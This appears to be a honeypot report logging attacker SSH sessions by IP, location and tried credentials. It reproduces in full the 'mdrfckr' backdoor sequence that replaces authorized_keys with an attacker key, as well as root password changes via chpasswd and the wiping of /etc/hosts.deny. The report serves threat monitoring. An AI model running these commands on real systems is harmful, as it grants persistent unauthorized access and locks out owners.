🎭 cipher_5 (45.78.235.121) β€” Singapore, Singapore Β· 1 session Β· 2 cmds
2026-05-31 16:27 EDT Β· as intern/intern
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 monet_root_3 (82.165.92.194) β€” Paris, France Β· 4 sessions Β· 8 cmds
2026-05-31 15:12 EDT Β· as jenkins/12345678, rachel/rachel123, root/1234Qwerty
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 4x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
🎭 shadow_root_40 (101.79.165.43) β€” Singapore, Singapore Β· 4 sessions Β· 8 cmds
2026-05-31 15:08 EDT Β· as jenkins/12345678, rachel/rachel123, root/1234Qwerty
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 4x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
🎭 phantom_root_40 (101.36.109.176) β€” Hong Kong, Hong Kong Β· 3 sessions Β· 6 cmds
2026-05-31 15:11 EDT Β· as rachel/rachel123, root/1234Qwerty, root/qq123456.
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 spice_root_2 (168.144.95.137) β€” Bengaluru, India Β· 4 sessions Β· 26 cmds
2026-05-24 05:11 EDT Β· as ftptest/test, jenkins/12345678, rachel/rachel123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "test\nTKIci06TI2I6\nTKIci06TI2I6"|passwd|bash
$ Enter new UNIX password:
$ echo "test\nTKIci06TI2I6\nTKIci06TI2I6\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 tsar_root_3 (37.77.150.241) β€” St Petersburg, Russia Β· 3 sessions Β· 6 cmds
2026-05-31 15:12 EDT Β· as jenkins/12345678, rachel/rachel123, root/qq123456.
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 lotus_root (103.182.132.154) β€” Delhi, India Β· 6 sessions Β· 64 cmds
2026-05-06 04:14 EDT Β· as csgoserver/123, develop/develop, root/1QAZ@2wsx
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—6 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—6 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:QWyWW5pr8koo"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123456\ntWo4HkTKQXq2\ntWo4HkTKQXq2"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\ntWo4HkTKQXq2\ntWo4HkTKQXq2\n"|passwd
$ echo "root:5RgpSO3wwVuh"|chpasswd|bash
🎭 rogue_root_46 (181.188.176.242) β€” La Paz, Bolivia Β· 1 session Β· 2 cmds
2026-05-31 14:59 EDT Β· as ubuntu/123@abc
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 monsoon_root_4 (123.253.162.254) β€” Bhopal, India Β· 3 sessions Β· 6 cmds
2026-05-31 14:49 EDT Β· as csgoserver/123, develop/develop, ssa/ssa
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 ghost_5 (43.134.42.6) β€” Singapore, Singapore Β· 1 session Β· 2 cmds
2026-05-31 14:48 EDT Β· as pgsql/pgsql
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 wok_2 (223.221.38.226) β€” Xining, China Β· 1 session Β· 20 cmds
2026-05-31 14:45 EDT Β· as csgoserver/123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123\nGtegjQtBuvQ2\nGtegjQtBuvQ2"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nGtegjQtBuvQ2\nGtegjQtBuvQ2\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_40 (36.82.45.61) β€” Medan, Indonesia Β· 1 session Β· 20 cmds
2026-05-31 14:43 EDT Β· as pgsql/pgsql
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "pgsql\nnTStI9LAhI6z\nnTStI9LAhI6z"|passwd|bash
$ Enter new UNIX password:
$ echo "pgsql\nnTStI9LAhI6z\nnTStI9LAhI6z\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ramen (133.125.236.103) β€” Chiyoda City, Japan Β· 1 session Β· 20 cmds
2026-05-31 14:38 EDT Β· as ssa/ssa
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ssa\nkIhiMdriU5tt\nkIhiMdriU5tt"|passwd|bash
$ Enter new UNIX password:
$ echo "ssa\nkIhiMdriU5tt\nkIhiMdriU5tt\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 hanbok_root_7 (61.76.38.54) β€” Busan, South Korea Β· 1 session Β· 19 cmds
2026-05-31 13:07 EDT Β· as root/11111111
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:HLTrKqlB57lU"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_9 (14.103.83.66) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-31 13:06 EDT Β· as root/a123456@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:baOd7wYw0Isu"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 roo_root_3 (223.27.17.37) β€” Narre Warren, Australia Β· 2 sessions Β· 38 cmds
2026-05-31 11:03 EDT Β· as root/lab123, root/qwe123!
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:wysQKytn7QbZ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:CRnnOTkrskuc"|chpasswd|bash
🎭 wraith_root_43 (118.99.102.207) β€” Utan, Indonesia Β· 2 sessions Β· 38 cmds
2026-05-31 11:03 EDT Β· as root/lab123, root/qwe123!
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:3xqrBZckO2lA"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:eS9BbF1HjiOh"|chpasswd|bash
🎭 bibimbap_root_4 (119.205.179.217) β€” Chuncheon, South Korea Β· 1 session Β· 19 cmds
2026-05-31 10:59 EDT Β· as root/qwe123!
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:g0oI2LGgtWAY"|chpasswd|bash
